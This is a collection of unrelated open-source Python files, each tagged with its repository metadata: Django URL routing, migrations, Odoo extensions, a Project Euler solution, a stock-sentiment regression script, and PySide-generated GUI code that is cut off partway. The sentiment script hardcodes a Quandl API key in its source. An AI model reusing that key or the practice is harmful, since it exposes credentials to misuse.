url(r'^i18n/', include('django.conf.urls.i18n')),
# Registration, login, logout
url(r'^register/$',
account_views.RegistrationView.as_view(),
name='registration'),
url(r'^login/$', 'django.contrib.auth.views.login', {
'template_name': 'login.html'}, name='login'),
url(r'^logout/$', 'django.contrib.auth.views.logout', {
'template_name': 'logout.html'}, name='logout'),
# Profile, account
url(r'^user/(?P<username>' +
account_models.USERNAME_REGEX +
')/$', frontend_views.UserView.as_view(),
name='profile'),
url(r'^account/$',
account_views.AccountChangeView.as_view(
), name='account'),
url(r'^account/password/change/$',
account_views.PasswordChangeView.as_view(
), name='password_change'),
url(r'^account/confirmation/$',
account_views.EmailConfirmationSendToken.as_view(),
name='email_confirmation_send_token'),
url(r'^account/confirmation/token/(?:(?P<confirmation_token>\w+)/)?$',
account_views.EmailConfirmationProcessToken.as_view(
), name='email_confirmaton_process_token'),
# Facebook
url(r'^facebook/login/$',
account_views.FacebookLoginView.as_view(
), name='facebook_login'),
url(r'^facebook/callback/$',
account_views.FacebookCallbackView.as_view(
), name='facebook_callback'),
)
if settings.DEBUG:
urlpatterns += patterns('',
url(r'^500/$', handler500, name='500'),
url(r'^404/$', handler404, name='404'),
url(r'^media/(?P<path>.*)$', 'django.views.static.serve', {
'document_root': settings.MEDIA_ROOT,
})
)
|
Irrialite/YouTune
|
youtune/urls.py
|
Python
|
bsd-3-clause
| 3,081
|
'''
Created on 24.05.2014
@author: alex
'''
class Person(object):
'''
classdocs
'''
def __init__(self):
'''
Constructor
'''
|
sora7/listparse
|
OLD/CertainProg2/src/listparse/parsers/wa.py
|
Python
|
gpl-2.0
| 167
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Tournament.league'
db.add_column('League_tournament', 'league',
self.gf('django.db.models.fields.related.ForeignKey')(default=1, to=orm['League.League']),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Tournament.league'
db.delete_column('League_tournament', 'league_id')
models = {
'League.league': {
'Meta': {'object_name': 'League'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'})
},
'League.player': {
'Meta': {'object_name': 'Player'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'})
},
'League.tournament': {
'Meta': {'object_name': 'Tournament'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'league': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['League.League']"}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'})
}
}
complete_apps = ['League']
|
RedBulli/Django_SnookerStats
|
League/migrations/0004_league_to_tournament.py
|
Python
|
bsd-3-clause
| 1,572
|
# -*- encoding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2014 KMEE (http://www.kmee.com.br)
# @author Luis Felipe Mileo <mileo@kmee.com.br>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import osv
class AccountAnalyticLine(osv.osv):
_inherit = 'account.analytic.line'
def invoice_cost_create(self, cr, uid, ids, data=None, context=None):
inv_obj = self.pool.get('account.invoice')
line_obj = self.pool.get('account.invoice.line')
context.update({'type': 'out_invoice'})
invoice_ids = super(AccountAnalyticLine, self).invoice_cost_create( cr, uid, ids, data, context)
for invoice in inv_obj.browse(cr, uid, invoice_ids, context=context):
line_ids = line_obj.search(cr, uid, [('invoice_id', '=', invoice.id)])
if invoice.payment_term:
payment_term = invoice.payment_term.id
else:
payment_term = False
if invoice.partner_bank_id:
bank = invoice.partner_bank_id.id
else:
bank = False
if invoice.fiscal_category_id:
fiscal_category_id = invoice.fiscal_category_id.id
else:
fiscal_category_id = False
onchange = inv_obj.onchange_partner_id(cr, uid, [invoice.id], 'out_invoice', invoice.partner_id.id, invoice.date_invoice, payment_term, bank, invoice.company_id.id, fiscal_category_id)
parent_fposition_id = onchange['value']['fiscal_position']
for line in invoice.invoice_line:
result = line_obj.product_id_change(cr, uid, ids, line.product_id.id, line.uos_id.id, line.quantity, line.name,
'out_invoice', invoice.partner_id.id,
fposition_id=False, price_unit=line.price_unit,
currency_id=invoice.currency_id.id, context=context, company_id=invoice.company_id.id,
parent_fiscal_category_id=fiscal_category_id,
parent_fposition_id=parent_fposition_id)
line_obj.write(cr, uid, [line.id],result['value'],context)
inv_obj.write(cr, uid, [invoice.id], onchange['value'], context=context)
return invoice_ids
|
christiandev/l10n-brazil
|
__unported__/l10n_br_hr_timesheet_invoice/hr_timesheet_invoice.py
|
Python
|
agpl-3.0
| 3,193
|
#Project Euler Problem 4
#A palindromic number reads the same both ways. The largest palindrome made from the product of two 2-digit numbers is 9009 = 91 * 99.
#Find the largest palindrome made from the product of two 3-digit numbers.
def palindrome(test):
while len(test) > 2:
if test[0] == test[-1]:
test = test.rstrip(test[-1])
test = test.lstrip(test[0])
else:
return False
if test[0] == test[-1]:
return True
#print palindrome(str(99000009))
def palindrome2(test):
if test == "".join(reversed(test)):
return True
else:
return False
#print palindrome2("31213")
def largest_palindrome_from_3digitproducts():
hi_p = 0
t1 = 999
t2 = 999
count = 0
while t1 >= 100:
t2 = 999 - count
#print "t1 = {}".format(t1)
while t2 >= 1:
#print "t2 = {}".format(t2)
test = t1*t2
if palindrome2(str(test)) == True and test > hi_p:
hi_p = test
#print hi_p
t2 -=1
count += 1
t1 -=1
return "hi_p = {}".format(hi_p)
print largest_palindrome_from_3digitproducts()
def largest_palindrome_from_3digitproductsr(test=999): #with recursion (doesn't work yet) (semantic error cos only 999*999 and 999*998 not 999*997)
large_num = test * test
large_num2 = test * (test-1)
if palindrome(str(large_num)) == True:
return large_num
elif palindrome(str(large_num2)) == True:
return large_num2
else:
return largest_palindrome_from_3digitproductsr(test-1)
#print largest_palindrome_from_3digitproductsr()
"""
print 9*9 #highest square #digits involved 1
print 9*8 #new number times highest #because old digits finished, add new digit
print 8*8 #new squared #multiply involved digit by all involved hi to low
print 9*7 #new digit times highest
print 8*7#new times next highest
print 9*6#new2 times highest
print 7*7#new squared #new2 now new
print 8*6#new times next highest
print 9*5#
print 7*6
print 8*5
print 6*6
print 9*4
print 7*5
print 8*4
print 6*5
print 7*4
print 9*3
print 5*5
print 8*3
print 6*4
print 7*3
print 5*4
print 9*2
print 6*3
print 8*2
print 4*4
print 5*3
print 7*2
print 6*2
print 4*3
print 5*2
print 9*1
print 3*3
print 8*1
print 4*2
print 7*1
print 6*1
print 3*2
print 5*1
print 4*1
print 2*2
print 3*1
print 2*1
print 1*1 """
|
ieuan1630-cmis/ieuan1630-cmis-cs2
|
pep4.py
|
Python
|
cc0-1.0
| 2,405
|
""" This module analyzes the sentiment data provided by the American Association of Individual Investors ("AAII") which collects sentiment data from its members on
a weekly basis in regards to the 6 months’ stock market outlook. The module analyzes whether there is a connection between investor sentiment
and future performance of the S&P 500. The S&P 500 performance is measured in the relative change over 6 months.
The AAII provides three types of sentiment namely bullish, neutral, and bearish such that bullish + neutral + bearish = 1.
"""
import quandl
import datetime
import numpy as np
from sklearn import linear_model as lm
from sklearn.preprocessing import PolynomialFeatures as pf
from matplotlib import pyplot
def main(col= 1, deg = 1):
""" Main function which is called at the end of this file. Takes two optional int parameters. col is the column on which
the regression is to be performed, for example col = 1 corresponds to the bullish investors; deg determines the degree of the polynomial regression function.
Check the data.col attribute for a list of all column names. """
api_key = 'pqxsHzei5fGpxxCZ-yKH'
aaii = quandl.dataset('AAII','AAII_SENTIMENT',api_key)
regdata = createData(aaii)
clf = lm.TheilSenRegressor()
poly = pf(degree = deg)
X = np.array([e for e in regdata[:,col]]).reshape(-1,1)
Y = np.array([e for e in regdata[:,4]])
clf.fit(poly.fit_transform(X),Y)
print('Regression coefficients: {0}'.format(clf.coef_))
linsp = np.arange(0., 1., 0.2).reshape(-1,1)
plotY = clf.predict(poly.fit_transform(linsp))
pyplot.plot(X,Y, 'o', linsp, plotY)
pyplot.show()
def createData(data, period = 168):
"""The function createData takes a quandl.dataset object and an optional int parameter period and returns a numpy.array object containing the
data to be used in the regression analysis. The output colums are as follows: (0) Date, (1) percentage of bullish investors, (2) percentage of neutral investors,
(3) percentage of bearish investors, (4) change in the S&P500 between the date of the data and 6 months later (period = 168 days). """
result = []
endDate = data.end - datetime.timedelta(days = period)
iterData = [e for e in data.data if e[0] < endDate and (e[12] != None and e[1] != None and e[2] != None and e[3] != None)]
# Some of the earlier dates are missing some data points. The above if condition filters out all incomplete data points and restricts the analysis to dates that are up to 6 months before the latest data point.
for e in iterData:
futureValue = data.getFutureValue(e[0],period)[12]
# Determines the value of the S&P500 6 months later. The if condition insured that such a data point exists.
deltaSP = futureValue - e[12]
if e[12] == 0:
fraction = 0
else:
fraction = deltaSP/e[12]
result.append([e[0], e[1], e[2], e[3], fraction])
return np.array(result)
main()
|
kscheltat/quandl
|
docs/AAII.py
|
Python
|
gpl-3.0
| 3,088
|
{
'name': 'CookieBar',
'category': 'Website',
'summary': 'Informs visitors about storing cookies on their browser',
'version': '1.0',
'description': """
CookieBar
======================================
Informs visitors about storing cookies on their browser
""",
'author': 'Nedas Žilinskas <nedas.zilinskas@gmail.com>',
'website': 'http://nedaszilinskas.com',
'depends': ['website'],
'data': [
'data/x_cookiebar_config.xml',
'views/assets.xml',
'views/views.xml',
'views/templates.xml'
],
'installable': True
}
|
nedaszilinskas/Odoo-CMS-CookieBar
|
website_cookiebar/__openerp__.py
|
Python
|
mit
| 596
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'builder.ui'
#
# Created: Mon May 22 10:30:45 2017
# by: pyside-uic 0.2.15 running on PySide 1.2.4
#
# WARNING! All changes made in this file will be lost!
from PySide import QtCore, QtGui
class Ui_pandapower(object):
def setupUi(self, pandapower):
pandapower.setObjectName("pandapower")
pandapower.resize(1023, 702)
self.centralwidget = QtGui.QWidget(pandapower)
self.centralwidget.setObjectName("centralwidget")
self.verticalLayoutWidget = QtGui.QWidget(self.centralwidget)
self.verticalLayoutWidget.setGeometry(QtCore.QRect(0, 0, 1011, 661))
self.verticalLayoutWidget.setObjectName("verticalLayoutWidget")
self.verticalLayout = QtGui.QVBoxLayout(self.verticalLayoutWidget)
self.verticalLayout.setContentsMargins(0, 0, 0, 0)
self.verticalLayout.setObjectName("verticalLayout")
self.tabWidget = QtGui.QTabWidget(self.verticalLayoutWidget)
self.tabWidget.setObjectName("tabWidget")
self.main = QtGui.QWidget()
self.main.setObjectName("main")
self.main_save = QtGui.QPushButton(self.main)
self.main_save.setGeometry(QtCore.QRect(10, 90, 91, 31))
self.main_save.setObjectName("main_save")
self.main_losses = QtGui.QPushButton(self.main)
self.main_losses.setGeometry(QtCore.QRect(10, 170, 91, 31))
self.main_losses.setObjectName("main_losses")
self.main_load = QtGui.QPushButton(self.main)
self.main_load.setGeometry(QtCore.QRect(10, 50, 91, 31))
self.main_load.setObjectName("main_load")
self.main_solve = QtGui.QPushButton(self.main)
self.main_solve.setGeometry(QtCore.QRect(10, 130, 91, 31))
self.main_solve.setObjectName("main_solve")
self.main_message = QtGui.QTextBrowser(self.main)
self.main_message.setGeometry(QtCore.QRect(110, 10, 861, 581))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(0, 85, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 85, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 170, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(63, 127, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 42, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 56, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 85, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 170, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 85, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 85, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 170, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(63, 127, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 42, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 56, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 85, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 170, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 42, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 85, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 170, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(63, 127, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 42, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 56, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 42, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 42, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 85, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 85, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 85, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipText, brush)
self.main_message.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(10)
font.setWeight(75)
font.setBold(True)
self.main_message.setFont(font)
self.main_message.setProperty("cursor", QtCore.Qt.ArrowCursor)
self.main_message.setFrameShape(QtGui.QFrame.Box)
self.main_message.setFrameShadow(QtGui.QFrame.Plain)
self.main_message.setObjectName("main_message")
self.main_empty = QtGui.QPushButton(self.main)
self.main_empty.setGeometry(QtCore.QRect(10, 10, 91, 31))
self.main_empty.setObjectName("main_empty")
self.tabWidget.addTab(self.main, "")
self.inspect = QtGui.QWidget()
self.inspect.setObjectName("inspect")
self.inspect_ext_grid = QtGui.QPushButton(self.inspect)
self.inspect_ext_grid.setGeometry(QtCore.QRect(10, 160, 91, 31))
self.inspect_ext_grid.setObjectName("inspect_ext_grid")
self.inspect_xward = QtGui.QPushButton(self.inspect)
self.inspect_xward.setGeometry(QtCore.QRect(10, 370, 91, 31))
self.inspect_xward.setObjectName("inspect_xward")
self.inspect_load = QtGui.QPushButton(self.inspect)
self.inspect_load.setGeometry(QtCore.QRect(10, 100, 91, 31))
self.inspect_load.setObjectName("inspect_load")
self.inspect_dcline = QtGui.QPushButton(self.inspect)
self.inspect_dcline.setGeometry(QtCore.QRect(10, 400, 91, 31))
self.inspect_dcline.setObjectName("inspect_dcline")
self.inspect_shunt = QtGui.QPushButton(self.inspect)
self.inspect_shunt.setGeometry(QtCore.QRect(10, 280, 91, 31))
self.inspect_shunt.setObjectName("inspect_shunt")
self.inspect_trafo = QtGui.QPushButton(self.inspect)
self.inspect_trafo.setGeometry(QtCore.QRect(10, 190, 91, 31))
self.inspect_trafo.setObjectName("inspect_trafo")
self.inspect_trafo3w = QtGui.QPushButton(self.inspect)
self.inspect_trafo3w.setGeometry(QtCore.QRect(10, 220, 91, 31))
self.inspect_trafo3w.setObjectName("inspect_trafo3w")
self.inspect_gen = QtGui.QPushButton(self.inspect)
self.inspect_gen.setGeometry(QtCore.QRect(10, 250, 91, 31))
self.inspect_gen.setObjectName("inspect_gen")
self.inspect_impedance = QtGui.QPushButton(self.inspect)
self.inspect_impedance.setGeometry(QtCore.QRect(10, 310, 91, 31))
self.inspect_impedance.setObjectName("inspect_impedance")
self.inspect_sgen = QtGui.QPushButton(self.inspect)
self.inspect_sgen.setGeometry(QtCore.QRect(10, 130, 91, 31))
self.inspect_sgen.setObjectName("inspect_sgen")
self.inspect_switch = QtGui.QPushButton(self.inspect)
self.inspect_switch.setGeometry(QtCore.QRect(10, 70, 91, 31))
self.inspect_switch.setObjectName("inspect_switch")
self.inspect_measurement = QtGui.QPushButton(self.inspect)
self.inspect_measurement.setGeometry(QtCore.QRect(10, 430, 91, 31))
self.inspect_measurement.setObjectName("inspect_measurement")
self.inspect_ward = QtGui.QPushButton(self.inspect)
self.inspect_ward.setGeometry(QtCore.QRect(10, 340, 91, 31))
self.inspect_ward.setObjectName("inspect_ward")
self.inspect_message = QtGui.QTextBrowser(self.inspect)
self.inspect_message.setGeometry(QtCore.QRect(110, 10, 861, 581))
self.inspect_message.setFrameShape(QtGui.QFrame.Box)
self.inspect_message.setObjectName("inspect_message")
self.inspect_lines = QtGui.QPushButton(self.inspect)
self.inspect_lines.setGeometry(QtCore.QRect(10, 40, 91, 31))
self.inspect_lines.setObjectName("inspect_lines")
self.inspect_bus = QtGui.QPushButton(self.inspect)
self.inspect_bus.setGeometry(QtCore.QRect(10, 10, 91, 31))
self.inspect_bus.setObjectName("inspect_bus")
self.tabWidget.addTab(self.inspect, "")
self.html = QtGui.QWidget()
self.html.setObjectName("html")
self.html_webview = QtWebKit.QWebView(self.html)
self.html_webview.setGeometry(QtCore.QRect(110, 10, 861, 581))
self.html_webview.setUrl(QtCore.QUrl("about:blank"))
self.html_webview.setRenderHints(QtGui.QPainter.SmoothPixmapTransform|QtGui.QPainter.TextAntialiasing)
self.html_webview.setObjectName("html_webview")
self.html_show = QtGui.QPushButton(self.html)
self.html_show.setGeometry(QtCore.QRect(10, 10, 91, 31))
self.html_show.setObjectName("html_show")
self.tabWidget.addTab(self.html, "")
self.res = QtGui.QWidget()
self.res.setObjectName("res")
self.res_impedance = QtGui.QPushButton(self.res)
self.res_impedance.setGeometry(QtCore.QRect(10, 280, 91, 31))
self.res_impedance.setObjectName("res_impedance")
self.res_shunt = QtGui.QPushButton(self.res)
self.res_shunt.setGeometry(QtCore.QRect(10, 250, 91, 31))
self.res_shunt.setObjectName("res_shunt")
self.res_xward = QtGui.QPushButton(self.res)
self.res_xward.setGeometry(QtCore.QRect(10, 340, 91, 31))
self.res_xward.setObjectName("res_xward")
self.res_sgen = QtGui.QPushButton(self.res)
self.res_sgen.setGeometry(QtCore.QRect(10, 100, 91, 31))
self.res_sgen.setObjectName("res_sgen")
self.res_ward = QtGui.QPushButton(self.res)
self.res_ward.setGeometry(QtCore.QRect(10, 310, 91, 31))
self.res_ward.setObjectName("res_ward")
self.res_gen = QtGui.QPushButton(self.res)
self.res_gen.setGeometry(QtCore.QRect(10, 220, 91, 31))
self.res_gen.setObjectName("res_gen")
self.res_message = QtWebKit.QWebView(self.res)
self.res_message.setGeometry(QtCore.QRect(110, 10, 861, 551))
self.res_message.setStyleSheet("\n"
" table {border-collapse: collapse;width: 100%;}\n"
" tr:first {background:#e1e1e1;}\n"
" th,td {text-align:left; border:1px solid #e1e1e1;}\n"
" th {background-color: #4CAF50;color: white;}\n"
" tr:nth-child(even){background-color: #f2f2f2;}\n"
" ")
self.res_message.setUrl(QtCore.QUrl("about:blank"))
self.res_message.setObjectName("res_message")
self.res_bus = QtGui.QPushButton(self.res)
self.res_bus.setGeometry(QtCore.QRect(10, 10, 91, 31))
self.res_bus.setObjectName("res_bus")
self.res_trafo = QtGui.QPushButton(self.res)
self.res_trafo.setGeometry(QtCore.QRect(10, 160, 91, 31))
self.res_trafo.setObjectName("res_trafo")
self.res_ext_grid = QtGui.QPushButton(self.res)
self.res_ext_grid.setGeometry(QtCore.QRect(10, 130, 91, 31))
self.res_ext_grid.setObjectName("res_ext_grid")
self.res_lines = QtGui.QPushButton(self.res)
self.res_lines.setGeometry(QtCore.QRect(10, 40, 91, 31))
self.res_lines.setObjectName("res_lines")
self.res_trafo3w = QtGui.QPushButton(self.res)
self.res_trafo3w.setGeometry(QtCore.QRect(10, 190, 91, 31))
self.res_trafo3w.setObjectName("res_trafo3w")
self.res_dcline = QtGui.QPushButton(self.res)
self.res_dcline.setGeometry(QtCore.QRect(10, 370, 91, 31))
self.res_dcline.setObjectName("res_dcline")
self.res_load = QtGui.QPushButton(self.res)
self.res_load.setGeometry(QtCore.QRect(10, 70, 91, 31))
self.res_load.setObjectName("res_load")
self.tabWidget.addTab(self.res, "")
self.build = QtGui.QWidget()
self.build.setObjectName("build")
self.groupBox = QtGui.QGroupBox(self.build)
self.groupBox.setGeometry(QtCore.QRect(110, 0, 121, 281))
self.groupBox.setObjectName("groupBox")
self.create_bus = QtGui.QRadioButton(self.groupBox)
self.create_bus.setGeometry(QtCore.QRect(10, 50, 82, 17))
self.create_bus.setObjectName("create_bus")
self.create_line = QtGui.QRadioButton(self.groupBox)
self.create_line.setGeometry(QtCore.QRect(10, 80, 82, 17))
self.create_line.setObjectName("create_line")
self.create_trafo = QtGui.QRadioButton(self.groupBox)
self.create_trafo.setGeometry(QtCore.QRect(10, 110, 82, 17))
self.create_trafo.setObjectName("create_trafo")
self.create_edit_elements = QtGui.QRadioButton(self.groupBox)
self.create_edit_elements.setGeometry(QtCore.QRect(10, 20, 82, 17))
self.create_edit_elements.setChecked(True)
self.create_edit_elements.setObjectName("create_edit_elements")
self.create_ext_grid = QtGui.QRadioButton(self.groupBox)
self.create_ext_grid.setGeometry(QtCore.QRect(10, 140, 101, 17))
self.create_ext_grid.setObjectName("create_ext_grid")
self.create_load = QtGui.QRadioButton(self.groupBox)
self.create_load.setGeometry(QtCore.QRect(10, 170, 82, 17))
self.create_load.setObjectName("create_load")
self.create_gen = QtGui.QRadioButton(self.groupBox)
self.create_gen.setGeometry(QtCore.QRect(10, 200, 82, 17))
self.create_gen.setObjectName("create_gen")
self.create_sgen = QtGui.QRadioButton(self.groupBox)
self.create_sgen.setGeometry(QtCore.QRect(10, 230, 82, 17))
self.create_sgen.setObjectName("create_sgen")
self.build_shunt = QtGui.QPushButton(self.build)
self.build_shunt.setGeometry(QtCore.QRect(10, 270, 91, 31))
self.build_shunt.setObjectName("build_shunt")
self.main_build_frame = QtGui.QWidget(self.build)
self.main_build_frame.setGeometry(QtCore.QRect(240, 0, 801, 581))
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.main_build_frame.sizePolicy().hasHeightForWidth())
self.main_build_frame.setSizePolicy(sizePolicy)
self.main_build_frame.setObjectName("main_build_frame")
self.gridLayout = QtGui.QVBoxLayout(self.main_build_frame)
self.gridLayout.setContentsMargins(0, 0, 0, 0)
self.gridLayout.setObjectName("gridLayout")
self.build_impedance = QtGui.QPushButton(self.build)
self.build_impedance.setGeometry(QtCore.QRect(10, 300, 91, 31))
self.build_impedance.setObjectName("build_impedance")
self.build_bus = QtGui.QPushButton(self.build)
self.build_bus.setGeometry(QtCore.QRect(10, 0, 91, 31))
